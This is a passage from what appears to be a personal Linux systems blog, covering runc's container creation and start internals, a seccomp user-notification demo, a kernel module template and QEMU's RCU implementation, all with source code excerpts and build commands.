‘c.createExecFifo’ create a fifo in container directory, the default path is ‘/run/runc/<container id>/exec.fifo’ Then we reach to the internal start fucntion. The most work of ‘start’ is create a new parentProcess. A parentProcess just as its name indicates, it’s a process to lanuch child process which is the process defined in config.json. Why we need parentProcess, because we can’t put the one process in a container environment (separete namespace, cgroup control and so on) in one step. It needs severals steps. ‘parentProcess’ is an interface in runc, it has two implementation ‘setnsProcess’ and ‘initProcess’. These two again is used in the ‘runc exec’ and ‘runc creat/run’ two cases.

    func (c *linuxContainer) start(process *Process) (retErr error) {
            parent, err := c.newParentProcess(process)
            ...
            if err := parent.start(); err != nil {
                    return fmt.Errorf("unable to start container process: %w", err)
            }
            ...
    }

The ‘initProcess’ is defined as following:

    type initProcess struct {
            cmd             *exec.Cmd
            messageSockPair filePair
            logFilePair     filePair
            config          *initConfig
            manager         cgroups.Manager
            intelRdtManager intelrdt.Manager
            container       *linuxContainer
            fds             []string
            process         *Process
            bootstrapData   io.Reader
            sharePidns      bool
    }

The ‘cmd’ is the parent process’s program and args, the ‘process’ is the process info defined in config.json, the ‘bootstrapData’ contains the data that should be sent to the child process from parent. Let’s see how the parentProcess is created.

    func (c *linuxContainer) newParentProcess(p *Process) (parentProcess, error) {
            parentInitPipe, childInitPipe, err := utils.NewSockPair("init")
            if err != nil {
                    return nil, fmt.Errorf("unable to create init pipe: %w", err)
            }
            messageSockPair := filePair{parentInitPipe, childInitPipe}

            parentLogPipe, childLogPipe, err := os.Pipe()
            if err != nil {
                    return nil, fmt.Errorf("unable to create log pipe: %w", err)
            }
            logFilePair := filePair{parentLogPipe, childLogPipe}

            cmd := c.commandTemplate(p, childInitPipe, childLogPipe)
            ...
            return c.newInitProcess(p, cmd, messageSockPair, logFilePair)
    }

‘c.commandTemplate’ prepare the parentProcess’s command line. As we can see, the command is set to ‘c.initPath’ and ‘c.initArgs’. This is the ‘runc init’.It also add some environment variables to the parentProcess cmd. Two fd one for initpipe and one for logpipe is added through this way.

    func (c *linuxContainer) commandTemplate(p *Process, childInitPipe *os.File, childLogPipe *os.File) *exec.Cmd {
            cmd := exec.Command(c.initPath, c.initArgs[1:]...)
            cmd.Args[0] = c.initArgs[0]
            cmd.Stdin = p.Stdin
            cmd.Stdout = p.Stdout
            cmd.Stderr = p.Stderr
            cmd.Dir = c.config.Rootfs
            if cmd.SysProcAttr == nil {
                    cmd.SysProcAttr = &unix.SysProcAttr{}
            }
            cmd.Env = append(cmd.Env, "GOMAXPROCS="+os.Getenv("GOMAXPROCS"))
            cmd.ExtraFiles = append(cmd.ExtraFiles, p.ExtraFiles...)
            if p.ConsoleSocket != nil {
                    cmd.ExtraFiles = append(cmd.ExtraFiles, p.ConsoleSocket)
                    cmd.Env = append(cmd.Env,
                            "_LIBCONTAINER_CONSOLE="+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),
                    )
            }
            cmd.ExtraFiles = append(cmd.ExtraFiles, childInitPipe)
            cmd.Env = append(cmd.Env,
                    "_LIBCONTAINER_INITPIPE="+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),
                    "_LIBCONTAINER_STATEDIR="+c.root,
            )

            cmd.ExtraFiles = append(cmd.ExtraFiles, childLogPipe)
            cmd.Env = append(cmd.Env,
                    "_LIBCONTAINER_LOGPIPE="+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),
                    "_LIBCONTAINER_LOGLEVEL="+p.LogLevel,
            )

            // NOTE: when running a container with no PID namespace and the parent process spawning the container is
            // PID1 the pdeathsig is being delivered to the container's init process by the kernel for some reason
            // even with the parent still running.
            if c.config.ParentDeathSignal > 0 {
                    cmd.SysProcAttr.Pdeathsig = unix.Signal(c.config.ParentDeathSignal)
            }
            return cmd
    }

After prepare the cmd, ‘newParentProcess’ calls ‘newInitProcess’ to create a ‘initProcess’ object. ‘newInitProcess’ also create some bootstrap data, the data contains the clone flags in config.json and the nsmaps, this defines what namespaces will be used in the process of config.json.

    func (c *linuxContainer) newInitProcess(p *Process, cmd *exec.Cmd, messageSockPair, logFilePair filePair) (*initProcess, error) {
            cmd.Env = append(cmd.Env, "_LIBCONTAINER_INITTYPE="+string(initStandard))
            nsMaps := make(map[configs.NamespaceType]string)
            for _, ns := range c.config.Namespaces {
                    if ns.Path != "" {
                            nsMaps[ns.Type] = ns.Path
                    }
            }
            _, sharePidns := nsMaps[configs.NEWPID]
            data, err := c.bootstrapData(c.config.Namespaces.CloneFlags(), nsMaps, initStandard)
            ...
            init := &initProcess{
                    cmd:             cmd,
                    messageSockPair: messageSockPair,
                    logFilePair:     logFilePair,
                    manager:         c.cgroupManager,
                    intelRdtManager: c.intelRdtManager,
                    config:          c.newInitConfig(p),
                    container:       c,
                    process:         p,
                    bootstrapData:   data,
                    sharePidns:      sharePidns,
            }
            c.initProcess = init
            return init, nil
    }

‘CloneFlags’ return the clone flags which parsed from the config.json.

    func (n *Namespaces) CloneFlags() uintptr {
            var flag int
            for _, v := range *n {
                    if v.Path != "" {
                            continue
                    }
                    flag |= namespaceInfo[v.Type]
            }
            return uintptr(flag)
    }

The default created new namespaces contains following:

	"namespaces": [
		{
			"type": "pid"
		},
		{
			"type": "network"
		},
		{
			"type": "ipc"
		},
		{
			"type": "uts"
		},
		{
			"type": "mount"
		}
	],

After create a ‘parentProcess’, the ‘parent.start()’ is called to start the parent process in linuxContainer.start function. This function will create the initialization function by calling ‘p.cmd.Start()’.

    func (p *initProcess) start() (retErr error) {
            defer p.messageSockPair.parent.Close() //nolint: errcheck
            err := p.cmd.Start()
            ...
    }

parent start

Following pic is the brief description of this phase.

‘p.cmd.Start()’ will start a new process, its parent process, which is ‘runc init’. The handler of ‘init’ is in the ‘init.go’ file. The go is a high level language, but the namespace operations is so low level, so it should be handled not in the code. So init.go, it has import a nsenter pkg.

    _ "github.com/opencontainers/runc/libcontainer/nsenter"

nsenter pkg contains cgo code as following:

    package nsenter

    /*
    #cgo CFLAGS: -Wall
    extern void nsexec();
    void __attribute__((constructor)) init(void) {
            nsexec();
    }
    */
    import "C"

So the nsexec will be executed first. The code is in the ‘libcontainer/nsenter/nsexec.c’. ‘nsexec’ is a long function that I will use another post to discuss it. Here is just a summary of this parent process. In the ‘runc init’ parent process (which is runc:[0:PARENT]), it will clone a new process, which is named ‘runc:[1:CHILD]’, in the runc:[1:CHILD] process, it will set the namespace, but as the pid namespace only take effect in the children process the ‘runc:[1:CHILD]’ process will clone another process named ‘runc:[2:INIT]’. The original runc create process will do some sync work with these process.

Now the ‘runc:[2:INIT]’ is totally in new namespaces, the ‘init.go’ will call factory.StartInitialization to do the final initialization work and exec the process defined in config.json. ‘factory.StartInitialization’ will create a new ‘initer’ object, the ‘initer’ is an interface. Not surprisingly, there are two implementation which is one for ‘runc exec’(linuxSetnsInit) and one for ‘runc create/run’(linuxStandardInit). ‘StartInitialization’ finally calls the ‘i.Init()’ do the really initialization work.

    // StartInitialization loads a container by opening the pipe fd from the parent to read the configuration and state
    // This is a low level implementation detail of the reexec and should not be consumed externally
    func (l *LinuxFactory) StartInitialization() (err error) {
            ...
            i, err := newContainerInit(it, pipe, consoleSocket, fifofd, logPipeFd, mountFds)
            if err != nil {
                    return err
            }

            // If Init succeeds, syscall.Exec will not return, hence none of the defers will be called.
            return i.Init()
    }

Following is main routine of Init(). The Init’s work is mostly setting the configuration specified in the config.json. For example, setupNetwork, setupRoute, hostName, apply apparmor profile, sysctl, readonly path, seccomp and so on. Notice near the end of this function, it opens the execfifo pipe file which is the ‘/run/runc/<container id>/exec.fifo’. It writes data to it. As there is no reader for this pipe, so this write will be blocked.

    func (l *linuxStandardInit) Init() error {
            ...
            if err := setupNetwork(l.config); err != nil {
                    return err
            }
            if err := setupRoute(l.config.Config); err != nil {
                    return err
            }

            // initialises the labeling system
            selinux.GetEnabled()

            // We don't need the mountFds after prepareRootfs() nor if it fails.
            err := prepareRootfs(l.pipe, l.config, l.mountFds)
            ...
            if hostname := l.config.Config.Hostname; hostname != "" {
                    if err := unix.Sethostname([]byte(hostname)); err != nil {
                            return &os.SyscallError{Syscall: "sethostname", Err: err}
                    }
            }
            if err := apparmor.ApplyProfile(l.config.AppArmorProfile); err != nil {
                    return fmt.Errorf("unable to apply apparmor profile: %w", err)
            }

            for key, value := range l.config.Config.Sysctl {
                    if err := writeSystemProperty(key, value); err != nil {
                            return err
                    }
            }
            for _, path := range l.config.Config.ReadonlyPaths {
                    if err := readonlyPath(path); err != nil {
                            return fmt.Errorf("can't make %q read-only: %w", path, err)
                    }
            }
            for _, path := range l.config.Config.MaskPaths {
                    if err := maskPath(path, l.config.Config.MountLabel); err != nil {
                            return fmt.Errorf("can't mask path %s: %w", path, err)
                    }
            }
            pdeath, err := system.GetParentDeathSignal()
            if err != nil {
                    return fmt.Errorf("can't get pdeath signal: %w", err)
            }
            if l.config.NoNewPrivileges {
            ...
            if l.config.Config.Seccomp != nil && !l.config.NoNewPrivileges {
                    seccompFd, err := seccomp.InitSeccomp(l.config.Config.Seccomp)
                    if err != nil {
                            return err
                    }

                    if err := syncParentSeccomp(l.pipe, seccompFd); err != nil {
                            return err
                    }
            }
            if err := finalizeNamespace(l.config); err != nil {
                    return err
            }
            ...
            // Close the pipe to signal that we have completed our init.
            logrus.Debugf("init: closing the pipe to signal completion")
            _ = l.pipe.Close()

            // Close the log pipe fd so the parent's ForwardLogs can exit.
            if err := unix.Close(l.logFd); err != nil {
                    return &os.PathError{Op: "close log pipe", Path: "fd " + strconv.Itoa(l.logFd), Err: err}
            }

            // Wait for the FIFO to be opened on the other side before exec-ing the
            // user process. We open it through /proc/self/fd/$fd, because the fd that
            // was given to us was an O_PATH fd to the fifo itself. Linux allows us to
            // re-open an O_PATH fd through /proc.
            fifoPath := "/proc/self/fd/" + strconv.Itoa(l.fifoFd)
            fd, err := unix.Open(fifoPath, unix.O_WRONLY|unix.O_CLOEXEC, 0)
            if err != nil {
                    return &os.PathError{Op: "open exec fifo", Path: fifoPath, Err: err}
            }
            if _, err := unix.Write(fd, []byte("0")); err != nil {
                    return &os.PathError{Op: "write exec fifo", Path: fifoPath, Err: err}
            }

            // Close the O_PATH fifofd fd before exec because the kernel resets
            // dumpable in the wrong order. This has been fixed in newer kernels, but
            // we keep this to ensure CVE-2016-9962 doesn't re-emerge on older kernels.
            // N.B. the core issue itself (passing dirfds to the host filesystem) has
            // since been resolved.
            // https://github.com/torvalds/linux/blob/v4.9/fs/exec.c#L1290-L1318
            _ = unix.Close(l.fifoFd)

            s := l.config.SpecState
            s.Pid = unix.Getpid()
            s.Status = specs.StateCreated
            if err := l.config.Config.Hooks[configs.StartContainer].RunHooks(s); err != nil {
                    return err
            }

            return system.Exec(name, l.config.Args[0:], os.Environ())
    }

For now, we can the runc process is ./runc init.

    root@ubuntu:~/go/src# ps aux | grep runc
    root       4239  0.0  0.2 1090192 10400 ?       Ssl  Dec26   0:00 ./runc init
    root      10667  0.0  0.0  14432  1084 pts/0    S+   05:19   0:00 grep --color=auto runc
    root@ubuntu:~/go/src# cat /proc/4239/comm 
    runc:[2:INIT]

    root@ubuntu:/run/runc/test# runc list
    ID          PID         STATUS      BUNDLE                   CREATED                          OWNER
    test        4239        created     /home/test/mycontainer   2021-12-25T05:17:30.596712553Z   root

Now let’s execute ‘runc start test’. We can see following:

    root@ubuntu:/run/runc/test# runc start test
    root@ubuntu:/run/runc/test# runc list
    ID          PID         STATUS      BUNDLE                   CREATED                          OWNER
    test        4239        running     /home/test/mycontainer   2021-12-25T05:17:30.596712553Z   root
    root@ubuntu:/run/runc/test# runc ps test
    UID         PID   PPID  C STIME TTY          TIME CMD
    root       4239   2709  0 Dec26 ?        00:00:00 sleep 1000
    root@ubuntu:/run/runc/test# ls
    state.json

The ‘runc start’ will call ‘getContainer’ to get a container object and call the ‘Exec()’ of container which calls exec().

    func (c *linuxContainer) exec() error {
            path := filepath.Join(c.root, execFifoFilename)
            pid := c.initProcess.pid()
            blockingFifoOpenCh := awaitFifoOpen(path)
            for {
                    select {
                    case result := <-blockingFifoOpenCh:
                            return handleFifoResult(result)

                    case <-time.After(time.Millisecond * 100):
                            stat, err := system.Stat(pid)
                            if err != nil || stat.State == system.Zombie {
                                    // could be because process started, ran, and completed between our 100ms timeout and our system.Stat() check.
                                    // see if the fifo exists and has data (with a non-blocking open, which will succeed if the writing process is complete).
                                    if err := handleFifoResult(fifoOpen(path, false)); err != nil {
                                            return errors.New("container process is already dead")
                                    }
                                    return nil
                            }
                    }
            }
    }

The ‘handleFifoResult’ read data from the execfife pipe thus unblock the ‘runc:[2:INIT]’ process and finally the ‘runc:[2:INIT]’ will execute the process defined in config.json.

    func handleFifoResult(result openResult) error {
            if result.err != nil {
                    return result.err
            }
            f := result.file
            defer f.Close()
            if err := readFromExecFifo(f); err != nil {
                    return err
            }
            return os.Remove(f.Name())
    }

runc internals, part 1: usage, build and source architecture

2021-12-22T00:00:00+00:00

runc is the foundation of container technology. The idea of container is simple, put some process into a separate namespace and use cgroups to restrict these process’ resource usage and use overlayfs as filesystem for container. So it seems that the runc’s work is easy, just prepare the environment for container process and run it. In reality, it is not so easy. This serials will try to do a deep analysis of runc’s internal. This is the first part, how to use and build runc and the runc’s source code architecture.

install Go

Download Go binary from here, we uses ‘go1.17.5.linux-amd64.tar.gz’.

    wget https://go.dev/dl/go1.17.5.linux-amd64.tar.gz

Decompress it to /usr/local binary:

    tar -C /usr/local -xzf go1.17.5.linux-amd64.tar.gz

And go binary to $PATH and set the GOPATH and GOROOT directory, add following lines to ~/.profile

    export PATH=/usr/local/go/bin:$PATH
    export GOROOT=/usr/local/go
    export GOPATH=/home/test/go

Enable the setting:

    source  ~/.profile
    mkdir /home/test/go/bin
    mkdir /home/test/go/src
    mkdir /home/test/go/src

build runc

As the , first README.md of runc, install libseccomp-dev pkg:

    apt install libseccomp-dev

clone runc:

    mkdir /home/test/go/src/github.com/opencontainers
    cd /home/test/go/src/github.com/opencontainers
    git clone https://github.com/opencontainers/runc
    cd runc

Change the runc Makefile following two lines, add -gcflags “-N -l”:

    GO_BUILD := $(GO) build -trimpath $(GO_BUILDMODE) $(EXTRA_FLAGS) -tags "$(BUILDTAGS)" \
        -ldflags "-X main.gitCommit=$(COMMIT) -X main.version=$(VERSION) $(EXTRA_LDFLAGS)" -gcflags "-N -l"
    GO_BUILD_STATIC := CGO_ENABLED=1 $(GO) build -trimpath $(EXTRA_FLAGS) -tags "$(BUILDTAGS) netgo osusergo" \
        -ldflags "-extldflags -static -X main.gitCommit=$(COMMIT) -X main.version=$(VERSION) $(EXTRA_LDFLAGS)" -gcflags "-N -l"

build runc

    make
    make install

runc usage

    # create the top most bundle directory
    mkdir /mycontainer
    cd /mycontainer

    # create the rootfs directory
    mkdir rootfs

    # export busybox via Docker into the rootfs directory
    docker export $(docker create busybox) | tar -C rootfs -xvf -

    runc spec
    runc run test

Now we run a container.

Let’s debug runc. In order to let the runc find the source directory ‘github.com/opencontainers/runc/’, I copy ‘runc’ binary to ‘/home/test/go/src’.

    root@ubuntu:~/go/src# gdb --args ./runc  run --bundle /home/test/mycontainer/ test
    ...
    (gdb) b main.startContainer
    Breakpoint 1 at 0x60d100: file github.com/opencontainers/runc/utils_linux.go, line 374.
    (gdb) r
    Starting program: /home/test/go/src/runc run --bundle /home/test/mycontainer/ test
    ....

    Thread 1 "runc" hit Breakpoint 1, main.startContainer (context=0xc000144840, action=2 '\002', criuOpts=0x0, ~r3=824635577192, ~r4=...)
        at github.com/opencontainers/runc/utils_linux.go:374
    374	func startContainer(context *cli.Context, action CtAct, criuOpts *libcontainer.CriuOpts) (int, error) {
    (gdb) n
    375		if err := revisePidFile(context); err != nil {
    (gdb) n
    378		spec, err := setupSpec(context)
    (gdb) n
    379		if err != nil {
    (gdb) p spec
    $1 = (github.com/opencontainers/runtime-spec/specs-go.Spec *) 0xc000170380
    (gdb) p *spec
    $2 = {Version = 0xc0002067f0 "1.0.2-dev", Process = 0xc00020c000, Root = 0xc000127e90, Hostname = 0xc0002068b8 "runc", Mounts = {array = 0xc000184580, 
        len = 7, cap = 9}, Hooks = 0x0, Annotations = 0x0, Linux = 0xc00020c0f0, Solaris = 0x0, Windows = 0x0, VM = 0x0}
    (gdb) p *spec.Process 
    $3 = {Terminal = true, ConsoleSize = 0x0, User = {UID = 0, GID = 0, Umask = 0x0, AdditionalGids = {array = 0x0, len = 0, cap = 0}, Username = 0x0 ""}, 
    Args = {array = 0xc000149440, len = 1, cap = 4}, CommandLine = 0x0 "", Env = {array = 0xc000149480, len = 2, cap = 4}, Cwd = 0x5555561ba178 "/", 
    Capabilities = 0xc000170400, Rlimits = {array = 0xc000170480, len = 1, cap = 4}, NoNewPrivileges = true, ApparmorProfile = 0x0 "", OOMScoreAdj = 0x0, 
    SelinuxLabel = 0x0 ""}
    (gdb) 

runc source architecture

Following shows the source code architecture of runc

The runc binary has several subcommands, every handler is in the go file of root directory. The core code of runc is the libcontainer directory. In the next post I will analysis the runc create and start command.

reference

探索 runC (上)

seccomp user notification

2021-05-20T00:00:00+00:00

seccomp user notification defers the seccomp decisions to userspace. This post Seccomp Notify has a very detail description of this feature. The page has an example of seccomp. I change this example to following: seccomp BPF will forward the listen syscall’s decision to userspace. And the tracer will print the listen port and can block the specified port to be listenend. Just a poc and the program doesn’t exit normally.

    #define _GNU_SOURCE
    #include <sys/types.h>
    #include <sys/prctl.h>
    #include <fcntl.h>
    #include <limits.h>
    #include <signal.h>
    #include <sys/wait.h>
    #include <stddef.h>
    #include <stdbool.h>
    #include <linux/audit.h>
    #include <sys/syscall.h>
    #include <sys/stat.h>
    #include <linux/filter.h>
    #include <linux/seccomp.h>
    #include <sys/ioctl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <errno.h>
    #include <netinet/in.h>

    #include "scm_functions.h"

    #define errExit(msg)    do { perror(msg); exit(EXIT_FAILURE); \
                            } while (0)

    static int
    seccomp(unsigned int operation, unsigned int flags, void *args)
    {
        return syscall(__NR_seccomp, operation, flags, args);
    }

    static int
    pidfd_getfd(int pidfd, int targetfd, unsigned int flags)
    {
        return syscall(438, pidfd, targetfd, flags);
    }

    static int
    pidfd_open(pid_t pid, unsigned int flags)
    {
        return syscall(__NR_pidfd_open, pid, flags);
    }


    #define X32_SYSCALL_BIT         0x40000000

    #define X86_64_CHECK_ARCH_AND_LOAD_SYSCALL_NR \
            BPF_STMT(BPF_LD | BPF_W | BPF_ABS, \
                    (offsetof(struct seccomp_data, arch))), \
            BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 0, 2), \
            BPF_STMT(BPF_LD | BPF_W | BPF_ABS, \
                    (offsetof(struct seccomp_data, nr))), \
            BPF_JUMP(BPF_JMP | BPF_JGE | BPF_K, X32_SYSCALL_BIT, 0, 1), \
            BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS)


    static int
    installNotifyFilter(void)
    {
        struct sock_filter filter[] = {
            X86_64_CHECK_ARCH_AND_LOAD_SYSCALL_NR,

            /* mkdir() triggers notification to user-space tracer */

            BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_listen, 0, 1),
            BPF_STMT(BPF_RET + BPF_K, SECCOMP_RET_USER_NOTIF),

            /* Every other system call is allowed */

            BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
        };

        struct sock_fprog prog = {
            .len = (unsigned short) (sizeof(filter) / sizeof(filter[0])),
            .filter = filter,
        };

        int notifyFd = seccomp(SECCOMP_SET_MODE_FILTER,
                            SECCOMP_FILTER_FLAG_NEW_LISTENER, &prog);
        if (notifyFd == -1)
            errExit("seccomp-install-notify-filter");

        return notifyFd;
    }

    static void
    closeSocketPair(int sockPair[2])
    {
        if (close(sockPair[0]) == -1)
            errExit("closeSocketPair-close-0");
        if (close(sockPair[1]) == -1)
            errExit("closeSocketPair-close-1");
    }

    static pid_t
    targetProcess(int sockPair[2], char *argv[])
    {
        pid_t targetPid;
        int notifyFd;
        struct sigaction sa;
        int s;
        int sockfd;
        struct sockaddr_in sockaddr;

        targetPid = fork();
        if (targetPid == -1)
            errExit("fork");

        if (targetPid > 0)          /* In parent, return PID of child */
            return targetPid;


        printf("Target process: PID = %ld\n", (long) getpid());

        if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0))
            errExit("prctl");

        notifyFd = installNotifyFilter();


        if (sendfd(sockPair[0], notifyFd) == -1)
            errExit("sendfd");

        if (close(notifyFd) == -1)
            errExit("close-target-notify-fd");

        closeSocketPair(sockPair);

        sockfd = socket(AF_INET, SOCK_STREAM, 0);
        sockaddr.sin_family = AF_INET;
        sockaddr.sin_addr.s_addr = htonl(INADDR_ANY);
        sockaddr.sin_port = htons(80);
        if (bind(sockfd, (struct sockaddr*)&sockaddr, sizeof(sockaddr)))
            errExit("Target process: bind error");
        if (listen(sockfd, 1024))
            errExit("Target process: listen error");
        printf("listen success\n");
        

    }

    static void
    checkNotificationIdIsValid(int notifyFd, __u64 id, char *tag)
    {
        if (ioctl(notifyFd, SECCOMP_IOCTL_NOTIF_ID_VALID, &id) == -1) {
            fprintf(stderr, "Tracer: notification ID check (%s): "
                    "target has died!!!!!!!!!!!\n", tag);
        }
    }

    /* Handle notifications that arrive via SECCOMP_RET_USER_NOTIF file
    descriptor, 'notifyFd'. */

    static void
    watchForNotifications(int notifyFd)
    {
        struct seccomp_notif *req;
        struct seccomp_notif_resp *resp;
        struct seccomp_notif_sizes sizes;
        char path[PATH_MAX];
        int procMem;        /* FD for /proc/PID/mem of target process */

        int pidfd;
        int listennum;
        int listenfd;

        struct sockaddr_in sa;
        int salen = sizeof(sa);

        if (seccomp(SECCOMP_GET_NOTIF_SIZES, 0, &sizes) == -1)
            errExit("Tracer: seccomp-SECCOMP_GET_NOTIF_SIZES");

        req = malloc(sizes.seccomp_notif);
        if (req == NULL)
            errExit("Tracer: malloc");

        resp = malloc(sizes.seccomp_notif_resp);
        if (resp == NULL)
            errExit("Tracer: malloc");

        /* Loop handling notifications */

        for (;;) {

            /* Wait for next notification, returning info in '*req' */

            if (ioctl(notifyFd, SECCOMP_IOCTL_NOTIF_RECV, req) == -1)
                errExit("Tracer: ioctlSECCOMP_IOCTL_NOTIF_RECV");

            printf("Tracer: got notification for PID %d; ID is %llx\n",
                    req->pid, req->id);


        pidfd = pidfd_open(req->pid, 0);
        listennum = req->data.args[0];
        listenfd = pidfd_getfd(pidfd, listennum, 0);
        getsockname(listenfd, &sa, &salen);
        printf("Tracer: listen %d port\n", ntohs(sa.sin_port));

            resp->id = req->id;
            resp->flags = SECCOMP_USER_NOTIF_FLAG_CONTINUE;        
            resp->error = 0;

            resp->val = 0;

            if (ioctl(notifyFd, SECCOMP_IOCTL_NOTIF_SEND, resp) == -1) {
                if (errno == ENOENT)
                    printf("Tracer: response failed with ENOENT; perhaps target "
                            "process's syscall was interrupted by signal?\n");
                else
                    perror("ioctl-SECCOMP_IOCTL_NOTIF_SEND");
            }
        }
    }

    static pid_t
    tracerProcess(int sockPair[2])
    {
        pid_t tracerPid;

        tracerPid = fork();
        if (tracerPid == -1)
            errExit("fork");

        if (tracerPid > 0)          /* In parent, return PID of child */
            return tracerPid;

        /* Child falls through to here */

        printf("Tracer: PID = %ld\n", (long) getpid());

        /* Receive the notification file descriptor from the target process */

        int notifyFd = recvfd(sockPair[1]);
        if (notifyFd == -1)
            errExit("recvfd");

        closeSocketPair(sockPair);  /* We no longer need the socket pair */

        /* Handle notifications */

        watchForNotifications(notifyFd);

        exit(EXIT_SUCCESS);         /* NOTREACHED */
    }

    int main(int argc, char *argv[])
    {
        pid_t targetPid, tracerPid;
        int sockPair[2];

        setbuf(stdout, NULL);

        if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockPair) == -1)
            errExit("socketpair");

        targetPid = targetProcess(sockPair, &argv[optind]);

        tracerPid = tracerProcess(sockPair);

        closeSocketPair(sockPair);

        waitpid(targetPid, NULL, 0);
        printf("Parent: target process has terminated\n");

        waitpid(tracerPid, NULL, 0);

        exit(EXIT_SUCCESS);
    }

hello world driver

2021-05-12T00:00:00+00:00

After several years kernel development, I still can’t remember the templeate of driver. So I write this post.

Ubuntu

Install kernel header.

    apt install linux-headers-`uname -r`

hello.c

    #include <linux/module.h>
    #include <linux/init.h>

    MODULE_LICENSE("GPL");

    static int hello_init(void)
    {
        printk("Hello word\n");
        return 0;
    }


    static void hello_exit(void)
    {
        printk("Goodbye,Hello word\n");
    }

    module_init(hello_init);
    module_exit(hello_exit);

Makefile

    obj-m+=hello.o
    all:
        make -C /lib/modules/$(shell uname -r)/build/ M=$(shell pwd) modules
    clean:
        make -C /lib/modules/$(shell uname -r)/build/ M=$(shell pwd) clean

redhat

yum install kernel-devel-uname -r

QEMU RCU implementation

2021-03-14T00:00:00+00:00

RCU is a synchronization mechanism that firstly used in Linux kernel. Now there is also a userspace RCU implementation library called liburcu. In general, RCU is used to protect read-mostly data structures. This post is about how qemu implements RCU.

Overview

QEMU rcu is ported from liburcu. librcu has various version, for least invasive QEMU chose the urcu-mb implementation.

QEMU RCU core has a global counter named ‘rcu_gp_ctr’ which is used by both readers and updaters. Every thread has a thread local variable of ‘ctr’ counter in ‘rcu_reader_data’ struct.

The updater will updates this counter in ‘synchronize_rcu’ to indicate a new of the resource. The reader will copy ‘rcu_gp_ctr’ to his own ‘ctr’ varaible when calling ‘rcu_read_lock’.

When the ‘synchronize_rcu’ find that the readers’ ‘ctr’ is not the same as the ‘rcu_gp_ctr’ it will set the ‘rcu_reader_data->waiting’ bool variable, and when the ‘rcu_read_unlock’ finds this bool variable is set it will trigger a event thus notify the ‘synchronize_rcu’ that it leaves the critical section. Following shows the idea of QEMU RCU.

‘rcu_reader_data’ is defined as following:

    struct rcu_reader_data {
        /* Data used by both reader and synchronize_rcu() */
        unsigned long ctr;
        bool waiting;

        /* Data used by reader only */
        unsigned depth;

        /* Data used for registry, protected by rcu_registry_lock */
        QLIST_ENTRY(rcu_reader_data) node;
    };

Initialization

Every thread that uses RCU need to call ‘rcu_register_thread’ to insert the thread local variable ‘rcu_reader’ to the global registry list.

    void rcu_register_thread(void)
    {
        assert(rcu_reader.ctr == 0);
        qemu_mutex_lock(&rcu_registry_lock);
        QLIST_INSERT_HEAD(&registry, &rcu_reader, node);
        qemu_mutex_unlock(&rcu_registry_lock);
    }

Read side

‘rcu_read_lock’ is used by the reader. The ‘rcu_reader->depth’ is used for nested lock case. Here we can see it copies the ‘rcu_gp_ctr’ to the ‘rcu_reader->ctr’.

    static inline void rcu_read_lock(void)
    {
        struct rcu_reader_data *p_rcu_reader = &rcu_reader;
        unsigned ctr;

        if (p_rcu_reader->depth++ > 0) {
            return;
        }

        ctr = qatomic_read(&rcu_gp_ctr);
        qatomic_set(&p_rcu_reader->ctr, ctr);

        /* Write p_rcu_reader->ctr before reading RCU-protected pointers.  */
        smp_mb_placeholder();
    }

‘rcu_read_unlock’ is used by the reader when leaves the critical section. It reset ‘rcu_reader->ctr’ to 0 and if it finds ‘rcu_reader->waiting’ is set, it will set the ‘rcu_gp_event’.

    static inline void rcu_read_unlock(void)
    {
        struct rcu_reader_data *p_rcu_reader = &rcu_reader;

        assert(p_rcu_reader->depth != 0);
        if (--p_rcu_reader->depth > 0) {
            return;
        }

        /* Ensure that the critical section is seen to precede the
        * store to p_rcu_reader->ctr.  Together with the following
        * smp_mb_placeholder(), this ensures writes to p_rcu_reader->ctr
        * are sequentially consistent.
        */
        qatomic_store_release(&p_rcu_reader->ctr, 0);

        /* Write p_rcu_reader->ctr before reading p_rcu_reader->waiting.  */
        smp_mb_placeholder();
        if (unlikely(qatomic_read(&p_rcu_reader->waiting))) {
            qatomic_set(&p_rcu_reader->waiting, false);
            qemu_event_set(&rcu_gp_event);
        }
    }

Write side

The updater will call ‘call_rcu’ which will insert a node to the RCU thread queue. And the thread function ‘call_rcu_thread’ will process this queue and it will call ‘synchronize_rcu’. For the most case, it will add ‘rcu_gp_ctr’ and call ‘wait_for_readers’.

    void synchronize_rcu(void)
    {
        QEMU_LOCK_GUARD(&rcu_sync_lock);

        /* Write RCU-protected pointers before reading p_rcu_reader->ctr.
        * Pairs with smp_mb_placeholder() in rcu_read_lock().
        */
        smp_mb_global();

        QEMU_LOCK_GUARD(&rcu_registry_lock);
        if (!QLIST_EMPTY(&registry)) {
            /* In either case, the qatomic_mb_set below blocks stores that free
            * old RCU-protected pointers.
            */
            if (sizeof(rcu_gp_ctr) < 8) {
               ...
            } else {
                /* Increment current grace period.  */
                qatomic_mb_set(&rcu_gp_ctr, rcu_gp_ctr + RCU_GP_CTR);
            }

            wait_for_readers();
        }
    }

‘rcu_gp_ongoing’ is used to check whether the there is a read in critical section. If it is, the new ‘rcu_gp_ctr’ will not be the same as the ‘rcu_reader_data->ctr’ and will set ‘rcu_reader_data->waiting’ to be true. If ‘registry’ is empty it means all readers has leaves the critical section and this means no old reader hold the old version pointer and the RCU thread can call the callback which insert to the RCU queue.

    static void wait_for_readers(void)
    {
        ThreadList qsreaders = QLIST_HEAD_INITIALIZER(qsreaders);
        struct rcu_reader_data *index, *tmp;

        for (;;) {
            /* We want to be notified of changes made to rcu_gp_ongoing
            * while we walk the list.
            */
            qemu_event_reset(&rcu_gp_event);

            /* Instead of using qatomic_mb_set for index->waiting, and
            * qatomic_mb_read for index->ctr, memory barriers are placed
            * manually since writes to different threads are independent.
            * qemu_event_reset has acquire semantics, so no memory barrier
            * is needed here.
            */
            QLIST_FOREACH(index, &registry, node) {
                qatomic_set(&index->waiting, true);
            }

            /* Here, order the stores to index->waiting before the loads of
            * index->ctr.  Pairs with smp_mb_placeholder() in rcu_read_unlock(),
